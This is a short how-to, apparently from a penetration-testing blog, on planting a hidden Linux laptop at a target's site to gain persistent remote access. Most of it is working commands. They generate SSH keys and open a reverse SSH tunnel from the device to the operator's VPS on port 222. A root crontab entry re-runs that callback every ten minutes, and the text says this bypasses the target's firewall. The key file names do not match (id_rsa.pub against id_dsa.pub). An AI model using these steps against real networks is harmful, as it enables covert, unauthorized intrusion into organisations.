The point should be obvious. Deploy a stealthy box/laptop (linux based toaster?) at a target’s site. Have it call home on a ubiquitous/innocuous port, bypassing any firewall rules and voila you are inside the candy shell.
Install Linux (depending on situation you might want FDE)
install security tools (nmap, build-essential, nc, etc)
Disable sleep in BIOS
ssh-keygen -t rsa (on laptop)
scp ~/.ssh/id_rsa.pub MYVPS:~
cat id_dsa.pub >> .ssh/authorized_keys
NOTE that the usernames must match on local and remote system
/usr/bin/ssh root@MYVPS -R *:222:localhost:22 -N -q -o ‘BatchMode yes’ -o ‘ExitOnForwardFailure yes’
Add to roots crontab
crontab -e */10 * * * * /scripts/callhome
Now ssh to your VPS box and then ssh localhost -p 222, you’re now authenticating to your callback box.